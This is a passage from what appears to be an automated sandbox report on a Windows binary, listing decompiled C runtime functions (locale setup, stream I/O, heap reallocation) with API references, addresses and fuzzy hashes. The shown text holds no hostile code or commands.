0x00c41166
0x00c4387e
0x00c43882
0x00c43890
0x00000000
0x00c438a0
0x00c438a1
0x00c43884
0x00c4388c
0x00c4388c

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00C410D4

Part of subcall function 00C425B8: _setlocale.LIBCMT ref: 00C425C9

_free.LIBCMT ref: 00C410E4

Part of subcall function 00C44444: HeapFree.KERNEL32(00000000,00000000,?,00C43DE0,?,?,00C4100B), ref: 00C44458
Part of subcall function 00C44444: GetLastError.KERNEL32(?,?,00C43DE0,?,?,00C4100B), ref: 00C4446A

_free.LIBCMT ref: 00C410FB
_free.LIBCMT ref: 00C41112
_free.LIBCMT ref: 00C41129
_free.LIBCMT ref: 00C41140
_free.LIBCMT ref: 00C41157

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: af87efac90be8f42f39c91e69d8a2bc7bdb3ba17449884f2f2b6d87ef9e3b065
Instruction ID: 0cce40578a823746545700a141c86f64d444073c0d85b4514e2ddce19aeb573a
Opcode Fuzzy Hash: af87efac90be8f42f39c91e69d8a2bc7bdb3ba17449884f2f2b6d87ef9e3b065
Instruction Fuzzy Hash: E10100F0A007404BEB34DF66D906B1BB6E87F10704F084928E99AC7642E775F6089B92

Uniqueness

Uniqueness Score: -1.00%

Function 00C4AB93, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00C4AB93(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00C4AD4D(_t3);
				if(E00C46BFF() != 0) {
					_t6 = E00C4F3E1(_t5, E00C4A929);
					 *0xc5fb24 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00C47C92(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00C4AC09();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00C4F40B(_t9,  *0xc5fb24, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00C4AAE7(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00C4AC09();
					return 0;
				}
			}

0x00c4ab93
0x00c4ab9f
0x00c4abae
0x00c4abb4
0x00c4abb9
0x00c4abbc
0x00000000
0x00c4abbe
0x00c4abcb
0x00c4abcf
0x00c4abd1
0x00c4ac00
0x00c4ac00
0x00c4ac05
0x00c4ac08
0x00c4abd3
0x00c4abe1
0x00c4abe3
0x00000000
0x00c4abe5
0x00c4abe5
0x00c4abe7
0x00c4abe8
0x00c4abef
0x00c4abf5
0x00c4abf9
0x00c4abfd
0x00c4abff
0x00c4abff
0x00c4abe3
0x00c4abd1
0x00c4aba1
0x00c4aba1
0x00c4aba1
0x00c4aba8
0x00c4aba8

APIs

__init_pointers.LIBCMT ref: 00C4AB93

Part of subcall function 00C4AD4D: RtlEncodePointer.NTDLL(00000000,?,00C4AB98,00C44742,00C5D128,00000014,00000018,00C5D03C,?,00000001), ref: 00C4AD50
Part of subcall function 00C4AD4D: __initp_misc_winsig.LIBCMT ref: 00C4AD71

__mtinitlocks.LIBCMT ref: 00C4AB98

Part of subcall function 00C46BFF: InitializeCriticalSectionAndSpinCount.KERNEL32(00C5F870,00000FA0,?,?,00C4AB9D,00C44742,00C5D128,00000014,00000018,00C5D03C,?,00000001), ref: 00C46C1D

__mtterm.LIBCMT ref: 00C4ABA1
__calloc_crt.LIBCMT ref: 00C4ABC6
__initptd.LIBCMT ref: 00C4ABE8
GetCurrentThreadId.KERNEL32 ref: 00C4ABEF

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
String ID:
API String ID: 2211675822-0
Opcode ID: 0d1fb575cfef86cadf98492ec058ce8ed3031ad23e60348abdec3c8ccad688fd
Instruction ID: 73eb549972614553b76d879d942bf22a67a8667acdce2806d74d166ddae1943a
Opcode Fuzzy Hash: 0d1fb575cfef86cadf98492ec058ce8ed3031ad23e60348abdec3c8ccad688fd
Instruction Fuzzy Hash: E2F0FA325893115BE2A87BB5BC4774A36A4FF01331B214A29F4A1E40E2FE1288826146

Uniqueness

Uniqueness Score: -1.00%

Function 00C49C15, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C49C15(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E00C4B78F(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E00C4E000(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E00C45E0E();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E00C5099F(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E00C45E0E();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E00C4F2D3(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E00C4E2CA(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									 *_t92 = _t87 + 1;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0xc5fd60;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0xcc7560 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E00C4F159(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E00C4E2CA(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E00C44C63(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E00C44C63(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}

0x00c49c19
0x00c49c20
0x00c49c28
0x00c49c2d
0x00c49c33
0x00c49c36
0x00c49c38
0x00c49c3b
0x00c49c4a
0x00c49c4d
0x00c49c67
0x00c49c69
0x00c49c6c
0x00c49c81
0x00c49c87
0x00c49c8a
0x00c49c8d
0x00c49c90
0x00c49c95
0x00c49c97
0x00c49c9f
0x00c49ca1
0x00c49caf
0x00c49cb0
0x00c49cb6
0x00c49cb8
0x00000000
0x00000000
0x00c49ca3
0x00c49ca3
0x00c49cab
0x00c49cad
0x00c49cba
0x00c49cbb
0x00000000
0x00000000
0x00000000
0x00c49cad
0x00c49ca1
0x00c49cc1
0x00c49cc8
0x00c49d46
0x00c49d47
0x00c49d48
0x00c49d4e
0x00c49d4f
0x00c49d50
0x00c49d58
0x00000000
0x00c49cca
0x00c49cca
0x00c49cd2
0x00c49cd7
0x00c49cda
0x00c49cdd
0x00c49ce0
0x00c49ce2
0x00c49cfb
0x00c49cfe
0x00c49d1b
0x00c49d1b
0x00c49d00
0x00c49d00
0x00c49d03
0x00000000
0x00c49d05
0x00c49d12
0x00c49d12
0x00c49d03
0x00c49d20
0x00c49d24
0x00000000
0x00c49d26
0x00c49d26
0x00c49d28
0x00c49d29
0x00c49d2a
0x00c49d30
0x00c49d35
0x00c49d38
0x00000000
0x00000000
0x00000000
0x00000000
0x00c49d38
0x00c49ce4
0x00c49ce4
0x00c49ce5
0x00c49ce6
0x00c49cef
0x00c49d3a
0x00c49d3d
0x00c49d40
0x00c49d5a
0x00c49d5a
0x00c49d5d
0x00c49d68
0x00c49d5f
0x00c49d5f
0x00c49d5f
0x00c49d5f
0x00c49d5f
0x00000000
0x00c49d5f
0x00c49d5d
0x00c49ce2
0x00c49c6e
0x00c49c6e
0x00c49c71
0x00c49c74
0x00c49cf6
0x00c49d63
0x00c49d63
0x00c49c76
0x00c49c79
0x00c49c79
0x00c49c7c
0x00c49c7e
0x00000000
0x00c49c7e
0x00c49c74
0x00c49c4f
0x00c49c4f
0x00c49c54
0x00000000
0x00c49c54
0x00c49c3d
0x00c49c3d
0x00c49c42
0x00c49c5a
0x00c49c5a
0x00c49c5e
0x00c49c5e
0x00c49d70
0x00c49c22
0x00c49c26
0x00c49c26

APIs

__ioinit.LIBCMT ref: 00C49C19

Part of subcall function 00C4B78F: InitOnceExecuteOnce.KERNEL32(00CC6160,00C4B7CA,00000000,00000000,00C461F5,00C5D1D0,0000000C,00C4266D,?), ref: 00C4B79D

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: 3b630b98f98d95f4181b42a1ed124cdd786bf720b9420b7c3aa62e168e5ffe90
Instruction ID: 33f8c1a009f2e412131afc89875c56e9f69e75d9af42df002a016261ed0e68a3
Opcode Fuzzy Hash: 3b630b98f98d95f4181b42a1ed124cdd786bf720b9420b7c3aa62e168e5ffe90
Instruction Fuzzy Hash: 0A4103B1900B119ED7389F29C8C1A7B77E4FF45370B14862DE8B6C62D1D774DA409B50

Uniqueness

Uniqueness Score: -1.00%

Function 00C41040, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00C41040(void* __ecx, void* __esi, char* _a4) {
				char _v16;
				char* _t33;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				void* _t58;
				signed int* _t60;
				signed int* _t61;
				void* _t64;
				void* _t65;
				void* _t67;
				signed int* _t68;
				void* _t74;
				void* _t75;
				void* _t76;

				_t75 = _t74 - 0xc;
				_t67 = __ecx;
				E00C43822(__ecx, 0);
				 *(__ecx + 4) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *(__ecx + 0xc) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *(__ecx + 0x14) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t33 = _a4;
				_t80 = _t33;
				if(_t33 == 0) {
					_t60 =  &_v16;
					_a4 = "bad locale name";
					E00C43CCB(_t60,  &_a4);
					_v16 = 0xc59084;
					E00C4560A( &_v16, 0xc5d720);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t67);
					_t68 = _t60;
					E00C425B8(_t68);
					_t39 = _t68[0xb];
					_t76 = _t75 + 4;
					__eflags = _t39;
					if(_t39 != 0) {
						E00C44444(_t39);
						_t76 = _t76 + 4;
					}
					_t68[0xb] = 0;
					_t40 = _t68[9];
					__eflags = _t40;
					if(_t40 != 0) {
						E00C44444(_t40);
						_t76 = _t76 + 4;
					}
					_t68[9] = 0;
					_t41 = _t68[7];
					__eflags = _t41;
					if(_t41 != 0) {
						E00C44444(_t41);
						_t76 = _t76 + 4;
					}
					_t68[7] = 0;
					_t42 = _t68[5];
					__eflags = _t42;
					if(_t42 != 0) {
						E00C44444(_t42);
						_t76 = _t76 + 4;
					}
					_t68[5] = 0;
					_t43 = _t68[3];
					__eflags = _t43;
					if(_t43 != 0) {
						E00C44444(_t43);
						_t76 = _t76 + 4;
					}
					_t68[3] = 0;
					_t44 = _t68[1];
					__eflags = _t44;
					if(_t44 != 0) {
						E00C44444(_t44);
					}
					_t68[1] = 0;
					_t61 = _t68;
					_t45 =  *_t61;
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags = _t45 - 4;
						if(_t45 < 4) {
							_t47 = 0xcc57e8 + _t45 * 0x18;
							__eflags = 0xcc57e8 + _t45 * 0x18;
							return E00C43C86(0xcc57e8 + _t45 * 0x18, _t47);
						}
						return _t45;
					} else {
						return E00C46C34(0xc);
					}
				} else {
					E00C4256D(_t58, _t64, _t65, __ecx, _t80, __ecx, _t33);
					return _t67;
				}
			}

0x00c41043
0x00c41049
0x00c4104b
0x00c41050
0x00c41057
0x00c4105d
0x00c41064
0x00c41068
0x00c4106c
0x00c41073
0x00c41076
0x00c4107a
0x00c4107d
0x00c41080
0x00c41083
0x00c41086
0x00c41089
0x00c4108b
0x00c410a4
0x00c410a7
0x00c410ae
0x00c410bc
0x00c410c3
0x00c410c8
0x00c410c9
0x00c410ca
0x00c410cb
0x00c410cc
0x00c410cd
0x00c410ce
0x00c410cf
0x00c410d0
0x00c410d1
0x00c410d4
0x00c410d9
0x00c410dc
0x00c410df
0x00c410e1
0x00c410e4
0x00c410e9
0x00c410e9
0x00c410ec
0x00c410f3
0x00c410f6
0x00c410f8
0x00c410fb
0x00c41100
0x00c41100
0x00c41103
0x00c4110a
0x00c4110d
0x00c4110f
0x00c41112
0x00c41117
0x00c41117
0x00c4111a
0x00c41121
0x00c41124
0x00c41126
0x00c41129
0x00c4112e
0x00c4112e
0x00c41131
0x00c41138
0x00c4113b
0x00c4113d
0x00c41140
0x00c41145
0x00c41145
0x00c41148
0x00c4114f
0x00c41152
0x00c41154
0x00c41157
0x00c4115c
0x00c4115f
0x00c41166
0x00c4387e
0x00c43880
0x00c43882
0x00c4388d
0x00c43890
0x00c43895
0x00c43895
0x00000000
0x00c438a0
0x00c438a1
0x00c43884
0x00c4388c
0x00c4388c
0x00c4108d
0x00c4108f
0x00c4109d
0x00c4109d

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C4104B

Part of subcall function 00C43822: __lock.LIBCMT ref: 00C43833

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C4108F

Part of subcall function 00C4256D: _setlocale.LIBCMT ref: 00C42574
Part of subcall function 00C4256D: _Yarn.LIBCPMT ref: 00C4258C
Part of subcall function 00C4256D: _setlocale.LIBCMT ref: 00C4259C
Part of subcall function 00C4256D: _Yarn.LIBCPMT ref: 00C425B0

std::exception::exception.LIBCMT ref: 00C410AE
__CxxThrowException@8.LIBCMT ref: 00C410C3

Strings

bad locale name, xrefs: 00C410A7

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Yarn_setlocalestd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw__lockstd::exception::exception
String ID: bad locale name
API String ID: 601777697-1405518554
Opcode ID: 89be6f01c88c5dbeca0a3003cdae20b879ee443d18fb0b3340e3ce12ac977147
Instruction ID: 9179f4e11637a089ff103116718af0708bdcc384cde8ddc4719ffaf125b20bd7
Opcode Fuzzy Hash: 89be6f01c88c5dbeca0a3003cdae20b879ee443d18fb0b3340e3ce12ac977147
Instruction Fuzzy Hash: 0F0140715007449EC320DF69C445B97BBE8AF18340F048A5EE89AC7641D774E2488BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00C431D4, Relevance: 7.6, APIs: 5, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00C431D4(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				void* _t62;
				intOrPtr _t72;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t103;
				signed int* _t109;
				void* _t112;
				signed int _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				void* _t117;

				_t113 = __esi;
				_push(0x2c);
				E00C456BB(E00C56E74, __ebx, __edi, __esi);
				_t112 = __ecx;
				_t60 =  *((intOrPtr*)(__ecx + 0x1c));
				_t95 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))));
				if(_t95 == 0) {
					L3:
					_t93 = 0;
					__eflags =  *((intOrPtr*)(_t112 + 0x50));
					if( *((intOrPtr*)(_t112 + 0x50)) != 0) {
						E00C42C12(_t112);
						__eflags =  *((intOrPtr*)(_t112 + 0x40));
						if(__eflags != 0) {
							 *((intOrPtr*)(_t117 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t117 - 0x18)) = 0;
							 *((char*)(_t117 - 0x28)) = 0;
							_push( *((intOrPtr*)(_t112 + 0x50)));
							 *((intOrPtr*)(_t117 - 4)) = 0;
							_t62 = E00C461B9(0, _t112, _t113, __eflags);
							_t113 = _t113 | 0xffffffff;
							while(1) {
								__eflags = _t62 - _t113;
								if(_t62 == _t113) {
									break;
								}
								E00C41BF0(_t62, _t117 - 0x28, 1, _t62);
								__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
								_t93 =  *((intOrPtr*)(_t117 - 0x28));
								if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
									 *((intOrPtr*)(_t117 - 0x34)) = _t117 - 0x28;
								} else {
									 *((intOrPtr*)(_t117 - 0x34)) = _t93;
								}
								__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
								if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
									_t93 = _t117 - 0x28;
								}
								_t72 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 0x40)))) + 0x18))(_t112 + 0x48, _t93,  *((intOrPtr*)(_t117 - 0x18)) +  *((intOrPtr*)(_t117 - 0x34)), _t117 - 0x30, _t117 - 0x29, _t117 - 0x28, _t117 - 0x38);
								__eflags = _t72;
								if(_t72 < 0) {
									L22:
									E00C41AC0(_t117 - 0x28);
									L23:
									return E00C45679(_t93, _t112, _t113);
								} else {
									__eflags = _t72 - 1;
									if(_t72 <= 1) {
										__eflags =  *((intOrPtr*)(_t117 - 0x38)) - _t117 - 0x29;
										if( *((intOrPtr*)(_t117 - 0x38)) != _t117 - 0x29) {
											__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
											_t114 =  *((intOrPtr*)(_t117 - 0x28));
											if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
												_t114 = _t117 - 0x28;
											}
											_t77 =  *((intOrPtr*)(_t117 - 0x30));
											_t116 = _t114 - _t77 +  *((intOrPtr*)(_t117 - 0x18));
											__eflags = _t116;
											if(__eflags <= 0) {
												L21:
												_t113 =  *(_t117 - 0x29) & 0x000000ff;
												goto L22;
											} else {
												goto L34;
											}
											while(1) {
												L34:
												_push( *((intOrPtr*)(_t112 + 0x50)));
												_t116 = _t116 - 1;
												_push( *((char*)(_t116 + _t77)));
												E00C46941(_t93, _t112, _t116, __eflags);
												__eflags = _t116;
												if(__eflags <= 0) {
													goto L21;
												}
												_t77 =  *((intOrPtr*)(_t117 - 0x30));
											}
											goto L21;
										}
										__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
										_t103 =  *((intOrPtr*)(_t117 - 0x28));
										if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
											_t103 = _t117 - 0x28;
										}
										_t81 =  *((intOrPtr*)(_t117 - 0x30)) - _t103;
										__eflags = _t81;
										_push(_t81);
										E00C41EE0(_t117 - 0x28, 0);
										L28:
										_push( *((intOrPtr*)(_t112 + 0x50)));
										_t62 = E00C461B9(_t93, _t112, _t113, __eflags);
										continue;
									}
									__eflags = _t72 - 3;
									if(_t72 != 3) {
										goto L22;
									}
									__eflags =  *((intOrPtr*)(_t117 - 0x18)) - 1;
									if(__eflags < 0) {
										goto L28;
									}
									__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
									_t83 =  *((intOrPtr*)(_t117 - 0x28));
									if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
										_t83 = _t117 - 0x28;
									}
									E00C469B6(_t117 - 0x29, 1, _t83, 1);
									goto L21;
								}
							}
							goto L22;
						}
						 *((char*)(_t117 - 0x2a)) = 0;
						_t60 = E00C42662(__eflags, _t117 - 0x2a,  *((intOrPtr*)(_t112 + 0x50)));
						__eflags = _t60;
						if(_t60 == 0) {
							goto L4;
						}
						goto L23;
					}
					L4:
					goto L23;
				}
				_t109 =  *(__ecx + 0x2c);
				_t113 =  *_t109;
				_t60 = _t113 + _t95;
				if(_t95 >= _t113 + _t95) {
					goto L3;
				}
				 *_t109 = _t113 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) + 1;
				goto L23;
			}

0x00c431d4
0x00c431d4
0x00c431db
0x00c431e0
0x00c431e2
0x00c431e5
0x00c431e9
0x00c4320e
0x00c4320e
0x00c43210
0x00c43213
0x00c4321f
0x00c43224
0x00c43227
0x00c43247
0x00c4324e
0x00c43251
0x00c43254
0x00c43257
0x00c4325a
0x00c4325f
0x00c43324
0x00c43325
0x00c43327
0x00000000
0x00000000
0x00c4326d
0x00c43272
0x00c43276
0x00c43279
0x00c43283
0x00c4327b
0x00c4327b
0x00c4327b
0x00c43286
0x00c4328a
0x00c4328c
0x00c4328c
0x00c432b0
0x00c432b3
0x00c432b5
0x00c432e8
0x00c432eb
0x00c432f2
0x00c432f7
0x00c432b7
0x00c432b7
0x00c432ba
0x00c432fb
0x00c432fe
0x00c4332f
0x00c43333
0x00c43336
0x00c43338
0x00c43338
0x00c4333b
0x00c43340
0x00c43343
0x00c43345
0x00c432e4
0x00c432e4
0x00000000
0x00000000
0x00000000
0x00000000
0x00c43347
0x00c43347
0x00c43347
0x00c4334a
0x00c4334f
0x00c43350
0x00c43357
0x00c43359
0x00000000
0x00000000
0x00c4335b
0x00c4335b
0x00000000
0x00c43347
0x00c43300
0x00c43304
0x00c43307
0x00c43309
0x00c43309
0x00c4330f
0x00c4330f
0x00c43311
0x00c43317
0x00c4331c
0x00c4331c
0x00c4331f
0x00000000
0x00c4331f
0x00c432bc
0x00c432bf
0x00000000
0x00000000
0x00c432c1
0x00c432c5
0x00000000
0x00000000
0x00c432c7
0x00c432cb
0x00c432ce
0x00c432d0
0x00c432d0
0x00c432dc
0x00000000
0x00c432e1
0x00c432b5
0x00000000
0x00c4332d
0x00c43230
0x00c43233
0x00c4323a
0x00c4323c
0x00000000
0x00000000
0x00000000
0x00c4323e
0x00c43215
0x00000000
0x00c43215
0x00c431eb
0x00c431ee
0x00c431f0
0x00c431f5
0x00000000
0x00000000
0x00c431fa
0x00c43204
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00C431DB
_fgetc.LIBCMT ref: 00C4331F
_ungetc.LIBCMT ref: 00C43350

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3__fgetc_ungetc
String ID:
API String ID: 1616942180-0
Opcode ID: caf6e64997ccdc2819e43770431f0dd4af47cb8e382ba0af54c5ac229b8bfa71
Instruction ID: 00b351f01bbba1ab14b1f81d72ae01c680728ae7debcc6dd573712e07f8a8ad0
Opcode Fuzzy Hash: caf6e64997ccdc2819e43770431f0dd4af47cb8e382ba0af54c5ac229b8bfa71
Instruction Fuzzy Hash: 3A517F71A0025ADFCF25DFA8C4819EEBBB4FF49314F14011AE511B7282DB71AB85DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F5EC, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00C4F5EC(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xcc5ae4, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xcc65bc - _t7;
								if(__eflags == 0) {
									_t9 = E00C44C63(__eflags);
									 *_t9 = E00C44C76(GetLastError());
									goto L17;
								} else {
									__eflags = E00C4B5B2(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00C44C63(__eflags);
										 *_t12 = E00C44C76(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
